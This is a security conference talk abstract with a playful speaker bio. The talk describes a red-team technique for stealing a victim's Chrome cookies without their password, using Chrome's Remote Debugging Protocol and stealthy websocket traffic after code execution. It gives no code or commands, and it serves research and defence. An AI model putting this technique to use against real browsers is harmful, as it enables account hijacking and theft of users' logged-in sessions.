Stealing Chrome cookies without a password

About “Alex”

“Alex” (@mangopdf) does Red Teaming, recently completed Operation ACTUAL CRIMES, and can’t wait until they’re inevitably struck down by their own hubris.

They’re known for hacking a friend (with consent!) in Operation Luigi, being an organiser for purplecon.nz (a defensive, inclusive, pastel-purple security conference) and for writing dumb blog posts on mango.pdf.zone.

They discovered that by combing “NAND” and “AND” logic gates they could make a new “N” logic gate that performs nothing this isn’t true i just get to write whatever i want here”

Talk Overview

If you steal someone’s Chrome cookies, you can log in to their accounts on every website they’re logged in to.

Normally you need the user’s password to do it, but I found a way to do it without the password. You just need to be able to execute code on their computer. It works by using Chrome’s Remote Debugging Protocol. To my knowledge this is the only way to extract a user’s Chrome cookies without their password, and by far the easiest way.

It involves plugging together several extremely forbidden and undocumented Chrome features, as well as figuring out how to speak the websocket protocol stealthily on a victim’s machine.

This talk is about how the technique was found, how it works, and what you can do with it.